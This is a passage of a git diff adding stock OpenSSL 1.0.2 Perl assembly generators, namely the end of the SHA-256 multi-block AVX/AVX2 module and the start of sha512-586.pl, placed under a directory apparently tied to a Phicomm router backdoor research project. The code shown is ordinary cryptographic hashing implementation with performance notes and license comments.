+	vpunpckldq	$t3,$t1,$t1
+	vinserti128	$t1,$Xi,$Xi
+	vpshufb		$Xn,$Xi,$Xi
+___
+$code.=<<___;
+	vpsrld	\$6,$e,$sigma
+	vpslld	\$26,$e,$t3
+	vmovdqu	$Xi,`&Xi_off($i)`
+	 vpaddd	$h,$Xi,$Xi			# Xi+=h
+
+	vpsrld	\$11,$e,$t2
+	vpxor	$t3,$sigma,$sigma
+	vpslld	\$21,$e,$t3
+	 vpaddd	`32*($i%8)-128`($Tbl),$Xi,$Xi	# Xi+=K[round]
+	vpxor	$t2,$sigma,$sigma
+
+	vpsrld	\$25,$e,$t2
+	vpxor	$t3,$sigma,$sigma
+	 `"prefetcht0	63(@ptr[0])"		if ($i==15)`
+	vpslld	\$7,$e,$t3
+	 vpandn	$g,$e,$t1
+	 vpand	$f,$e,$axb			# borrow $axb
+	 `"prefetcht0	63(@ptr[1])"		if ($i==15)`
+	vpxor	$t2,$sigma,$sigma
+
+	vpsrld	\$2,$a,$h			# borrow $h
+	vpxor	$t3,$sigma,$sigma		# Sigma1(e)
+	 `"prefetcht0	63(@ptr[2])"		if ($i==15)`
+	vpslld	\$30,$a,$t2
+	 vpxor	$axb,$t1,$t1			# Ch(e,f,g)
+	 vpxor	$a,$b,$axb			# a^b, b^c in next round
+	 `"prefetcht0	63(@ptr[3])"		if ($i==15)`
+	vpxor	$t2,$h,$h
+	vpaddd	$sigma,$Xi,$Xi			# Xi+=Sigma1(e)
+
+	vpsrld	\$13,$a,$t2
+	 `"prefetcht0	63(@ptr[4])"		if ($i==15 && $REG_SZ==32)`
+	vpslld	\$19,$a,$t3
+	 vpaddd	$t1,$Xi,$Xi			# Xi+=Ch(e,f,g)
+	 vpand	$axb,$bxc,$bxc
+	 `"prefetcht0	63(@ptr[5])"		if ($i==15 && $REG_SZ==32)`
+	vpxor	$t2,$h,$sigma
+
+	vpsrld	\$22,$a,$t2
+	vpxor	$t3,$sigma,$sigma
+	 `"prefetcht0	63(@ptr[6])"		if ($i==15 && $REG_SZ==32)`
+	vpslld	\$10,$a,$t3
+	 vpxor	$bxc,$b,$h			# h=Maj(a,b,c)=Ch(a^b,c,b)
+	 vpaddd	$Xi,$d,$d			# d+=Xi
+	 `"prefetcht0	63(@ptr[7])"		if ($i==15 && $REG_SZ==32)`
+	vpxor	$t2,$sigma,$sigma
+	vpxor	$t3,$sigma,$sigma		# Sigma0(a)
+
+	vpaddd	$Xi,$h,$h			# h+=Xi
+	vpaddd	$sigma,$h,$h			# h+=Sigma0(a)
+___
+$code.=<<___ if (($i%8)==7);
+	add	\$`32*8`,$Tbl
+___
+	($axb,$bxc)=($bxc,$axb);
+}
+
+sub ROUND_16_XX_avx {
+my $i=shift;
+
+$code.=<<___;
+	vmovdqu	`&Xi_off($i+1)`,$Xn
+	vpaddd	`&Xi_off($i+9)`,$Xi,$Xi		# Xi+=X[i+9]
+
+	vpsrld	\$3,$Xn,$sigma
+	vpsrld	\$7,$Xn,$t2
+	vpslld	\$25,$Xn,$t3
+	vpxor	$t2,$sigma,$sigma
+	vpsrld	\$18,$Xn,$t2
+	vpxor	$t3,$sigma,$sigma
+	vpslld	\$14,$Xn,$t3
+	vmovdqu	`&Xi_off($i+14)`,$t1
+	vpsrld	\$10,$t1,$axb			# borrow $axb
+
+	vpxor	$t2,$sigma,$sigma
+	vpsrld	\$17,$t1,$t2
+	vpxor	$t3,$sigma,$sigma		# sigma0(X[i+1])
+	vpslld	\$15,$t1,$t3
+	 vpaddd	$sigma,$Xi,$Xi			# Xi+=sigma0(e)
+	vpxor	$t2,$axb,$sigma
+	vpsrld	\$19,$t1,$t2
+	vpxor	$t3,$sigma,$sigma
+	vpslld	\$13,$t1,$t3
+	vpxor	$t2,$sigma,$sigma
+	vpxor	$t3,$sigma,$sigma		# sigma0(X[i+14])
+	vpaddd	$sigma,$Xi,$Xi			# Xi+=sigma1(X[i+14])
+___
+	&ROUND_00_15_avx($i,@_);
+	($Xi,$Xn)=($Xn,$Xi);
+}
+
+$code.=<<___;
+.type	sha256_multi_block_avx,\@function,3
+.align	32
+sha256_multi_block_avx:
+_avx_shortcut:
+___
+$code.=<<___ if ($avx>1);
+	shr	\$32,%rcx
+	cmp	\$2,$num
+	jb	.Lavx
+	test	\$`1<<5`,%ecx
+	jnz	_avx2_shortcut
+	jmp	.Lavx
+.align	32
+.Lavx:
+___
+$code.=<<___;
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+___
+$code.=<<___ if ($win64);
+	lea	-0xa8(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+	movaps	%xmm8,0x20(%rsp)
+	movaps	%xmm9,0x30(%rsp)
+	movaps	%xmm10,-0x78(%rax)
+	movaps	%xmm11,-0x68(%rax)
+	movaps	%xmm12,-0x58(%rax)
+	movaps	%xmm13,-0x48(%rax)
+	movaps	%xmm14,-0x38(%rax)
+	movaps	%xmm15,-0x28(%rax)
+___
+$code.=<<___;
+	sub	\$`$REG_SZ*18`, %rsp
+	and	\$-256,%rsp
+	mov	%rax,`$REG_SZ*17`(%rsp)		# original %rsp
+.Lbody_avx:
+	lea	K256+128(%rip),$Tbl
+	lea	`$REG_SZ*16`(%rsp),%rbx
+	lea	0x80($ctx),$ctx			# size optimization
+
+.Loop_grande_avx:
+	mov	$num,`$REG_SZ*17+8`(%rsp)	# original $num
+	xor	$num,$num
+___
+for($i=0;$i<4;$i++) {
+    $code.=<<___;
+	mov	`16*$i+0`($inp),@ptr[$i]	# input pointer
+	mov	`16*$i+8`($inp),%ecx		# number of blocks
+	cmp	$num,%ecx
+	cmovg	%ecx,$num			# find maximum
+	test	%ecx,%ecx
+	mov	%ecx,`4*$i`(%rbx)		# initialize counters
+	cmovle	$Tbl,@ptr[$i]			# cancel input
+___
+}
+$code.=<<___;
+	test	$num,$num
+	jz	.Ldone_avx
+
+	vmovdqu	0x00-0x80($ctx),$A		# load context
+	 lea	128(%rsp),%rax
+	vmovdqu	0x20-0x80($ctx),$B
+	vmovdqu	0x40-0x80($ctx),$C
+	vmovdqu	0x60-0x80($ctx),$D
+	vmovdqu	0x80-0x80($ctx),$E
+	vmovdqu	0xa0-0x80($ctx),$F
+	vmovdqu	0xc0-0x80($ctx),$G
+	vmovdqu	0xe0-0x80($ctx),$H
+	vmovdqu	.Lpbswap(%rip),$Xn
+	jmp	.Loop_avx
+
+.align	32
+.Loop_avx:
+	vpxor	$B,$C,$bxc			# magic seed
+___
+for($i=0;$i<16;$i++)	{ &ROUND_00_15_avx($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	vmovdqu	`&Xi_off($i)`,$Xi
+	mov	\$3,%ecx
+	jmp	.Loop_16_xx_avx
+.align	32
+.Loop_16_xx_avx:
+___
+for(;$i<32;$i++)	{ &ROUND_16_XX_avx($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	dec	%ecx
+	jnz	.Loop_16_xx_avx
+
+	mov	\$1,%ecx
+	lea	K256+128(%rip),$Tbl
+___
+for($i=0;$i<4;$i++) {
+    $code.=<<___;
+	cmp	`4*$i`(%rbx),%ecx		# examine counters
+	cmovge	$Tbl,@ptr[$i]			# cancel input
+___
+}
+$code.=<<___;
+	vmovdqa	(%rbx),$sigma			# pull counters
+	vpxor	$t1,$t1,$t1
+	vmovdqa	$sigma,$Xn
+	vpcmpgtd $t1,$Xn,$Xn			# mask value
+	vpaddd	$Xn,$sigma,$sigma		# counters--
+
+	vmovdqu	0x00-0x80($ctx),$t1
+	vpand	$Xn,$A,$A
+	vmovdqu	0x20-0x80($ctx),$t2
+	vpand	$Xn,$B,$B
+	vmovdqu	0x40-0x80($ctx),$t3
+	vpand	$Xn,$C,$C
+	vmovdqu	0x60-0x80($ctx),$Xi
+	vpand	$Xn,$D,$D
+	vpaddd	$t1,$A,$A
+	vmovdqu	0x80-0x80($ctx),$t1
+	vpand	$Xn,$E,$E
+	vpaddd	$t2,$B,$B
+	vmovdqu	0xa0-0x80($ctx),$t2
+	vpand	$Xn,$F,$F
+	vpaddd	$t3,$C,$C
+	vmovdqu	0xc0-0x80($ctx),$t3
+	vpand	$Xn,$G,$G
+	vpaddd	$Xi,$D,$D
+	vmovdqu	0xe0-0x80($ctx),$Xi
+	vpand	$Xn,$H,$H
+	vpaddd	$t1,$E,$E
+	vpaddd	$t2,$F,$F
+	vmovdqu	$A,0x00-0x80($ctx)
+	vpaddd	$t3,$G,$G
+	vmovdqu	$B,0x20-0x80($ctx)
+	vpaddd	$Xi,$H,$H
+	vmovdqu	$C,0x40-0x80($ctx)
+	vmovdqu	$D,0x60-0x80($ctx)
+	vmovdqu	$E,0x80-0x80($ctx)
+	vmovdqu	$F,0xa0-0x80($ctx)
+	vmovdqu	$G,0xc0-0x80($ctx)
+	vmovdqu	$H,0xe0-0x80($ctx)
+
+	vmovdqu	$sigma,(%rbx)			# save counters
+	vmovdqu	.Lpbswap(%rip),$Xn
+	dec	$num
+	jnz	.Loop_avx
+
+	mov	`$REG_SZ*17+8`(%rsp),$num
+	lea	$REG_SZ($ctx),$ctx
+	lea	`16*$REG_SZ/4`($inp),$inp
+	dec	$num
+	jnz	.Loop_grande_avx
+
+.Ldone_avx:
+	mov	`$REG_SZ*17`(%rsp),%rax		# orignal %rsp
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	movaps	-0xb8(%rax),%xmm6
+	movaps	-0xa8(%rax),%xmm7
+	movaps	-0x98(%rax),%xmm8
+	movaps	-0x88(%rax),%xmm9
+	movaps	-0x78(%rax),%xmm10
+	movaps	-0x68(%rax),%xmm11
+	movaps	-0x58(%rax),%xmm12
+	movaps	-0x48(%rax),%xmm13
+	movaps	-0x38(%rax),%xmm14
+	movaps	-0x28(%rax),%xmm15
+___
+$code.=<<___;
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	lea	(%rax),%rsp
+.Lepilogue_avx:
+	ret
+.size	sha256_multi_block_avx,.-sha256_multi_block_avx
+___
+						if ($avx>1) {
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+
+$REG_SZ=32;
+@ptr=map("%r$_",(12..15,8..11));
+
+@V=($A,$B,$C,$D,$E,$F,$G,$H)=map("%ymm$_",(8..15));
+($t1,$t2,$t3,$axb,$bxc,$Xi,$Xn,$sigma)=map("%ymm$_",(0..7));
+
+$code.=<<___;
+.type	sha256_multi_block_avx2,\@function,3
+.align	32
+sha256_multi_block_avx2:
+_avx2_shortcut:
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___ if ($win64);
+	lea	-0xa8(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+	movaps	%xmm8,0x20(%rsp)
+	movaps	%xmm9,0x30(%rsp)
+	movaps	%xmm10,0x40(%rsp)
+	movaps	%xmm11,0x50(%rsp)
+	movaps	%xmm12,-0x78(%rax)
+	movaps	%xmm13,-0x68(%rax)
+	movaps	%xmm14,-0x58(%rax)
+	movaps	%xmm15,-0x48(%rax)
+___
+$code.=<<___;
+	sub	\$`$REG_SZ*18`, %rsp
+	and	\$-256,%rsp
+	mov	%rax,`$REG_SZ*17`(%rsp)		# original %rsp
+.Lbody_avx2:
+	lea	K256+128(%rip),$Tbl
+	lea	0x80($ctx),$ctx			# size optimization
+
+.Loop_grande_avx2:
+	mov	$num,`$REG_SZ*17+8`(%rsp)	# original $num
+	xor	$num,$num
+	lea	`$REG_SZ*16`(%rsp),%rbx
+___
+for($i=0;$i<8;$i++) {
+    $code.=<<___;
+	mov	`16*$i+0`($inp),@ptr[$i]	# input pointer
+	mov	`16*$i+8`($inp),%ecx		# number of blocks
+	cmp	$num,%ecx
+	cmovg	%ecx,$num			# find maximum
+	test	%ecx,%ecx
+	mov	%ecx,`4*$i`(%rbx)		# initialize counters
+	cmovle	$Tbl,@ptr[$i]			# cancel input
+___
+}
+$code.=<<___;
+	vmovdqu	0x00-0x80($ctx),$A		# load context
+	 lea	128(%rsp),%rax
+	vmovdqu	0x20-0x80($ctx),$B
+	 lea	256+128(%rsp),%rbx
+	vmovdqu	0x40-0x80($ctx),$C
+	vmovdqu	0x60-0x80($ctx),$D
+	vmovdqu	0x80-0x80($ctx),$E
+	vmovdqu	0xa0-0x80($ctx),$F
+	vmovdqu	0xc0-0x80($ctx),$G
+	vmovdqu	0xe0-0x80($ctx),$H
+	vmovdqu	.Lpbswap(%rip),$Xn
+	jmp	.Loop_avx2
+
+.align	32
+.Loop_avx2:
+	vpxor	$B,$C,$bxc			# magic seed
+___
+for($i=0;$i<16;$i++)	{ &ROUND_00_15_avx($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	vmovdqu	`&Xi_off($i)`,$Xi
+	mov	\$3,%ecx
+	jmp	.Loop_16_xx_avx2
+.align	32
+.Loop_16_xx_avx2:
+___
+for(;$i<32;$i++)	{ &ROUND_16_XX_avx($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	dec	%ecx
+	jnz	.Loop_16_xx_avx2
+
+	mov	\$1,%ecx
+	lea	`$REG_SZ*16`(%rsp),%rbx
+	lea	K256+128(%rip),$Tbl
+___
+for($i=0;$i<8;$i++) {
+    $code.=<<___;
+	cmp	`4*$i`(%rbx),%ecx		# examine counters
+	cmovge	$Tbl,@ptr[$i]			# cancel input
+___
+}
+$code.=<<___;
+	vmovdqa	(%rbx),$sigma			# pull counters
+	vpxor	$t1,$t1,$t1
+	vmovdqa	$sigma,$Xn
+	vpcmpgtd $t1,$Xn,$Xn			# mask value
+	vpaddd	$Xn,$sigma,$sigma		# counters--
+
+	vmovdqu	0x00-0x80($ctx),$t1
+	vpand	$Xn,$A,$A
+	vmovdqu	0x20-0x80($ctx),$t2
+	vpand	$Xn,$B,$B
+	vmovdqu	0x40-0x80($ctx),$t3
+	vpand	$Xn,$C,$C
+	vmovdqu	0x60-0x80($ctx),$Xi
+	vpand	$Xn,$D,$D
+	vpaddd	$t1,$A,$A
+	vmovdqu	0x80-0x80($ctx),$t1
+	vpand	$Xn,$E,$E
+	vpaddd	$t2,$B,$B
+	vmovdqu	0xa0-0x80($ctx),$t2
+	vpand	$Xn,$F,$F
+	vpaddd	$t3,$C,$C
+	vmovdqu	0xc0-0x80($ctx),$t3
+	vpand	$Xn,$G,$G
+	vpaddd	$Xi,$D,$D
+	vmovdqu	0xe0-0x80($ctx),$Xi
+	vpand	$Xn,$H,$H
+	vpaddd	$t1,$E,$E
+	vpaddd	$t2,$F,$F
+	vmovdqu	$A,0x00-0x80($ctx)
+	vpaddd	$t3,$G,$G
+	vmovdqu	$B,0x20-0x80($ctx)
+	vpaddd	$Xi,$H,$H
+	vmovdqu	$C,0x40-0x80($ctx)
+	vmovdqu	$D,0x60-0x80($ctx)
+	vmovdqu	$E,0x80-0x80($ctx)
+	vmovdqu	$F,0xa0-0x80($ctx)
+	vmovdqu	$G,0xc0-0x80($ctx)
+	vmovdqu	$H,0xe0-0x80($ctx)
+
+	vmovdqu	$sigma,(%rbx)			# save counters
+	lea	256+128(%rsp),%rbx
+	vmovdqu	.Lpbswap(%rip),$Xn
+	dec	$num
+	jnz	.Loop_avx2
+
+	#mov	`$REG_SZ*17+8`(%rsp),$num
+	#lea	$REG_SZ($ctx),$ctx
+	#lea	`16*$REG_SZ/4`($inp),$inp
+	#dec	$num
+	#jnz	.Loop_grande_avx2
+
+.Ldone_avx2:
+	mov	`$REG_SZ*17`(%rsp),%rax		# orignal %rsp
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	movaps	-0xd8(%rax),%xmm6
+	movaps	-0xc8(%rax),%xmm7
+	movaps	-0xb8(%rax),%xmm8
+	movaps	-0xa8(%rax),%xmm9
+	movaps	-0x98(%rax),%xmm10
+	movaps	-0x88(%rax),%xmm11
+	movaps	-0x78(%rax),%xmm12
+	movaps	-0x68(%rax),%xmm13
+	movaps	-0x58(%rax),%xmm14
+	movaps	-0x48(%rax),%xmm15
+___
+$code.=<<___;
+	mov	-48(%rax),%r15
+	mov	-40(%rax),%r14
+	mov	-32(%rax),%r13
+	mov	-24(%rax),%r12
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	lea	(%rax),%rsp
+.Lepilogue_avx2:
+	ret
+.size	sha256_multi_block_avx2,.-sha256_multi_block_avx2
+___
+					}	}}}
+$code.=<<___;
+.align	256
+K256:
+___
+sub TABLE {
+    foreach (@_) {
+	$code.=<<___;
+	.long	$_,$_,$_,$_
+	.long	$_,$_,$_,$_
+___
+    }
+}
+&TABLE(	0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5,
+	0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5,
+	0xd807aa98,0x12835b01,0x243185be,0x550c7dc3,
+	0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174,
+	0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc,
+	0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da,
+	0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7,
+	0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967,
+	0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13,
+	0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85,
+	0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3,
+	0xd192e819,0xd6990624,0xf40e3585,0x106aa070,
+	0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5,
+	0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3,
+	0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208,
+	0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2 );
+$code.=<<___;
+.Lpbswap:
+	.long	0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f	# pbswap
+	.long	0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f	# pbswap
+K256_shaext:
+	.long	0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
+	.long	0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
+	.long	0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
+	.long	0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
+	.long	0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
+	.long	0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
+	.long	0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
+	.long	0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
+	.long	0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
+	.long	0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
+	.long	0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
+	.long	0xd192e819,0xd6990624,0xf40e3585,0x106aa070
+	.long	0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
+	.long	0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
+	.long	0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
+	.long	0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
+	.asciz	"SHA256 multi-block transform for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+if ($win64) {
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	se_handler,\@abi-omnipotent
+.align	16
+se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# end of prologue label
+	cmp	%r10,%rbx		# context->Rip<.Lbody
+	jb	.Lin_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=.Lepilogue
+	jae	.Lin_prologue
+
+	mov	`16*17`(%rax),%rax	# pull saved stack pointer
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+
+	lea	-24-10*16(%rax),%rsi
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$20,%ecx
+	.long	0xa548f3fc		# cld; rep movsq
+
+.Lin_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	se_handler,.-se_handler
+___
+$code.=<<___ if ($avx>1);
+.type	avx2_handler,\@abi-omnipotent
+.align	16
+avx2_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# end of prologue label
+	cmp	%r10,%rbx		# context->Rip<body label
+	jb	.Lin_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lin_prologue
+
+	mov	`32*17`($context),%rax	# pull saved stack pointer
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r12
+	mov	-32(%rax),%r13
+	mov	-40(%rax),%r14
+	mov	-48(%rax),%r15
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore cotnext->R12
+	mov	%r13,224($context)	# restore cotnext->R13
+	mov	%r14,232($context)	# restore cotnext->R14
+	mov	%r15,240($context)	# restore cotnext->R15
+
+	lea	-56-10*16(%rax),%rsi
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$20,%ecx
+	.long	0xa548f3fc		# cld; rep movsq
+
+	jmp	.Lin_prologue
+.size	avx2_handler,.-avx2_handler
+___
+$code.=<<___;
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_sha256_multi_block
+	.rva	.LSEH_end_sha256_multi_block
+	.rva	.LSEH_info_sha256_multi_block
+	.rva	.LSEH_begin_sha256_multi_block_shaext
+	.rva	.LSEH_end_sha256_multi_block_shaext
+	.rva	.LSEH_info_sha256_multi_block_shaext
+___
+$code.=<<___ if ($avx);
+	.rva	.LSEH_begin_sha256_multi_block_avx
+	.rva	.LSEH_end_sha256_multi_block_avx
+	.rva	.LSEH_info_sha256_multi_block_avx
+___
+$code.=<<___ if ($avx>1);
+	.rva	.LSEH_begin_sha256_multi_block_avx2
+	.rva	.LSEH_end_sha256_multi_block_avx2
+	.rva	.LSEH_info_sha256_multi_block_avx2
+___
+$code.=<<___;
+.section	.xdata
+.align	8
+.LSEH_info_sha256_multi_block:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lbody,.Lepilogue			# HandlerData[]
+.LSEH_info_sha256_multi_block_shaext:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lbody_shaext,.Lepilogue_shaext		# HandlerData[]
+___
+$code.=<<___ if ($avx);
+.LSEH_info_sha256_multi_block_avx:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lbody_avx,.Lepilogue_avx		# HandlerData[]
+___
+$code.=<<___ if ($avx>1);
+.LSEH_info_sha256_multi_block_avx2:
+	.byte	9,0,0,0
+	.rva	avx2_handler
+	.rva	.Lbody_avx2,.Lepilogue_avx2		# HandlerData[]
+___
+}
+####################################################################
+
+sub rex {
+  local *opcode=shift;
+  my ($dst,$src)=@_;
+  my $rex=0;
+
+    $rex|=0x04			if ($dst>=8);
+    $rex|=0x01			if ($src>=8);
+    unshift @opcode,$rex|0x40	if ($rex);
+}
+
+sub sha256op38 {
+    my $instr = shift;
+    my %opcodelet = (
+		"sha256rnds2" => 0xcb,
+  		"sha256msg1"  => 0xcc,
+		"sha256msg2"  => 0xcd	);
+
+    if (defined($opcodelet{$instr}) && @_[0] =~ /%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+      my @opcode=(0x0f,0x38);
+	rex(\@opcode,$2,$1);
+	push @opcode,$opcodelet{$instr};
+	push @opcode,0xc0|($1&7)|(($2&7)<<3);		# ModR/M
+	return ".byte\t".join(',',@opcode);
+    } else {
+	return $instr."\t".@_[0];
+    }
+}
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval($1)/ge;
+
+	s/\b(sha256[^\s]*)\s+(.*)/sha256op38($1,$2)/geo		or
+
+	s/\b(vmov[dq])\b(.+)%ymm([0-9]+)/$1$2%xmm$3/go		or
+	s/\b(vmovdqu)\b(.+)%x%ymm([0-9]+)/$1$2%xmm$3/go		or
+	s/\b(vpinsr[qd])\b(.+)%ymm([0-9]+),%ymm([0-9]+)/$1$2%xmm$3,%xmm$4/go	or
+	s/\b(vpextr[qd])\b(.+)%ymm([0-9]+)/$1$2%xmm$3/go	or
+	s/\b(vinserti128)\b(\s+)%ymm/$1$2\$1,%xmm/go		or
+	s/\b(vpbroadcast[qd]\s+)%ymm([0-9]+)/$1%xmm$2/go;
+
+	print $_,"\n";
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-586.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-586.pl
new file mode 100644
index 0000000..e96ec00
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-586.pl
@@ -0,0 +1,911 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# SHA512 block transform for x86. September 2007.
+#
+# May 2013.
+#
+# Add SSSE3 code path, 20-25% improvement [over original SSE2 code].
+#
+# Performance in clock cycles per processed byte (less is better):
+#
+#		gcc	icc	x86 asm	SIMD(*)	x86_64(**)
+# Pentium	100	97	61	-	-
+# PIII		75	77	56	-	-
+# P4		116	95	82	34.6	30.8
+# AMD K8	54	55	36	20.7	9.57
+# Core2		66	57	40	15.9	9.97
+# Westmere	70	-	38	12.2	9.58
+# Sandy Bridge	58	-	35	11.9	11.2
+# Ivy Bridge	50	-	33	11.5	8.17
+# Haswell	46	-	29	11.3	7.66
+# Bulldozer	121	-	50	14.0	13.5
+# VIA Nano	91	-	52	33	14.7
+# Atom		126	-	68	48(***)	14.7
+# Silvermont	97	-	58	42(***)	17.5
+#
+# (*)	whichever best applicable.
+# (**)	x86_64 assembler performance is presented for reference
+#	purposes, the results are for integer-only code.
+# (***)	paddq is increadibly slow on Atom.
+#
+# IALU code-path is optimized for elder Pentiums. On vanilla Pentium
+# performance improvement over compiler generated code reaches ~60%,
+# while on PIII - ~35%. On newer µ-archs improvement varies from 15%
+# to 50%, but it's less important as they are expected to execute SSE2
+# code-path, which is commonly ~2-3x faster [than compiler generated
+# code]. SSE2 code-path is as fast as original sha512-sse2.pl, even
+# though it does not use 128-bit operations. The latter means that
+# SSE2-aware kernel is no longer required to execute the code. Another
+# difference is that new code optimizes amount of writes, but at the
+# cost of increased data cache "footprint" by 1/2KB.
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],"sha512-586.pl",$ARGV[$#ARGV] eq "386");
+
